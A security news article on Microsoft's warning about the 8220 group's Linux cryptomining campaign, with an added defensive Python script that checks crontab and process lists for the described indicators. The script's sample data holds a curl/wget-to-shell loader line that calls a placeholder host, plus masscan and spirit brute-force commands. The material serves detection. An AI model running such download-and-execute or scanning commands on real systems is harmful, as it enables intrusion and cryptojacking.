Microsoft Spots Updated Cryptomining Malware Tool Targeting Linux Systems

Microsoft’s Security Intelligence team has issued a new warning against a known cloud threat actor (TA) group.

Tracked as 8220 and active since early 2017, the group is reported to have updated its malware toolset to breach Linux servers and install cryptominers as part of a long-running campaign.

“The updates include the deployment of new versions of a cryptominer and an IRC bot, as well as the use of an exploit for a recently disclosed vulnerability,” the technology giant wrote in a Twitter thread on Thursday.

“The group has actively updated its techniques and payloads over the last year.”

According to Microsoft, the most recent campaign now targets i686 and x86_64 Linux systems and uses RCE exploits for CVE-2022-26134 (Atlassian Confluence Server) and CVE-2019-2725 (Oracle WebLogic) for initial access.

“After initial access, a loader is downloaded,” explained the security experts. “This loader evades detection by clearing log files and disabling cloud monitoring and security tools. Tamper protection capabilities in Microsoft Defender for Endpoint help protect security settings.”

The loader then downloads the pwnRig cryptominer and an IRC bot that runs commands from a command-and-control (C2) server. It maintains persistence by creating either a cron job or a script that runs every 60 seconds under nohup.

According to Microsoft, the malware also features self-propagating capabilities.

“The loader uses the IP port scanner tool ‘masscan’ to find other SSH servers in the network and then uses the GoLang-based SSH brute force tool ‘spirit’ to propagate. It also scans the local disk for SSH keys to move laterally by connecting to known hosts.”
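The behaviours quoted above (an every-60-second cron or nohup loop, a download-and-execute loader, and the masscan and spirit tools running on the host) are the kind of thing a responder can check for during Linux host triage. The following script is an added example written for this article, not Microsoft's detection logic and not code from the campaign; it parses a crontab listing and a process list for those indicators. The crontab and `ps` output embedded in it are constructed samples, and `EXAMPLE-C2` is a placeholder host, not a real indicator.

```python
"""Linux host triage for the persistence and propagation behaviours described in
the article. Added example: not Microsoft's or the campaign's code. All sample
input below is constructed for the demonstration."""
import re
from dataclasses import dataclass

# Constructed sample of `crontab -l` output (EXAMPLE-C2 is a placeholder host).
SAMPLE_CRONTAB = """\
0 3 * * * /usr/local/bin/backup.sh
* * * * * (curl -fsSL http://EXAMPLE-C2/ldr.sh||wget -q -O- http://EXAMPLE-C2/ldr.sh)|sh
"""

# Constructed sample of `ps -eo pid,user,args` output.
SAMPLE_PS = """\
  PID USER     COMMAND
    1 root     /sbin/init
 2143 www-data nohup sh -c 'while true; do /tmp/.x/ldr.sh; sleep 60; done'
 2150 www-data masscan -p22 10.0.0.0/8 --rate 10000
 2151 www-data ./spirit -p 22 -f /tmp/hosts.txt
 2200 root     sshd: /usr/sbin/sshd -D
"""


@dataclass
class Finding:
    kind: str       # short indicator name
    evidence: str   # the crontab line or process command that triggered it


# Five "*" fields: the job fires every minute.
EVERY_MINUTE = re.compile(r"^\*\s+\*\s+\*\s+\*\s+\*\s+")
# Remote fetch piped straight into a shell (download-and-execute loader).
DOWNLOAD_EXEC = re.compile(r"\b(curl|wget)\b.*\|\s*(sh|bash)\b")
# Tool names named in the article (matched as whole words in the command line).
KNOWN_TOOLS = ("masscan", "spirit", "pwnrig")


def check_crontab(text):
    """Flag crontab entries that fetch and execute remote content."""
    findings = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        if EVERY_MINUTE.match(line) and DOWNLOAD_EXEC.search(line):
            findings.append(Finding("cron_every_minute_download_exec", line))
        elif DOWNLOAD_EXEC.search(line):
            findings.append(Finding("cron_download_exec", line))
    return findings


def check_processes(text):
    """Flag nohup 60-second loops and the scanning/brute-force tools."""
    findings = []
    for line in text.splitlines()[1:]:          # skip the PID/USER/COMMAND header
        parts = line.split(None, 2)
        if len(parts) < 3:
            continue
        cmd = parts[2]
        low = cmd.lower()
        if "nohup" in low and "sleep 60" in low:
            findings.append(Finding("nohup_60s_loop", cmd))
        for tool in KNOWN_TOOLS:
            if re.search(r"(^|[\s/])" + tool + r"\b", low):
                findings.append(Finding("tool_" + tool, cmd))
    return findings


def triage(crontab_text, ps_text):
    """Combine both checks; crontab findings first, then process findings."""
    return check_crontab(crontab_text) + check_processes(ps_text)


if __name__ == "__main__":
    for f in triage(SAMPLE_CRONTAB, SAMPLE_PS):
        print(f"[{f.kind}] {f.evidence}")
```

On a live host the two inputs would come from `crontab -l` for each user and `ps -eo pid,user,args`; a hit on the every-minute download-and-execute pattern or on the nohup loop is worth pulling the referenced script for, and a masscan or spirit process on a web server is a strong signal regardless of its name, since the article's loader also clears logs, so process state may be the freshest evidence left.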

To protect networks against this threat, Microsoft said organizations should secure systems and servers, apply updates, and use good credential hygiene.

“Microsoft Defender for Endpoint on Linux detects malicious behaviors and payloads related to this campaign.”

The news comes days after Akamai suggested the Atlassian Confluence flaw is currently witnessing 20,000 exploitation attempts per day, launched from about 6,000 IPs.

For context, the number represents a substantial decrease when compared to the peak of 100,000 the company witnessed upon the bug disclosure on June 02 2022.

